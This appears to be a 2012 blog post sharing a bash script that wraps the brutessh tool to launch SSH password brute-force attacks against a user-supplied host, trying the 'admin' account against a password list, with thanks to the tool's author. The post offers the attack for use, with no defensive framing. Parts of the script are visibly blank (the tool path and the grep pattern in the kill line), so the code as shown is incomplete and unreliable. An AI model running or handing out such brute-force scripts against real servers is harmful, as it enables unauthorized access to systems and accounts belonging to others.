Wednesday, February 15, 2012

SSH Brute Force attack tools

Here it is:

And I'v wrote a bash script to make it more easy to use as following:
1 #!/bin/bash
3 read -p "Please enter your target host: " HOST
4 echo "Enter run to launch SSH Brute Force Attack, or exit to leave it."
6 echo -n "[run/exit]? "
7 while read LINE;
8 do
9 if [ $LINE = "run" ]; then
10 clear
11 python /root/bin/brutessh/ -h $HOST -u admin -d /root/bin/brutessh/passlist.txt &
12 sleep 10
13 echo -n "***** Enter exit can stop SSH Brute Force attack immediately or rerun it again. ***** [run/exit]? "
14 continue
15 elif [ $LINE = "exit" ]; then
16 kill `ps aux | grep | grep -v grep |awk -F" " '{ print $2 }'` 2> /dev/null
17 break
18 fi
19 done

Please to adjust /root/bin/brutessh/ above to work with your environment.

Thanks to Igor Drobot ( blog author) and laramies (brutessh author).

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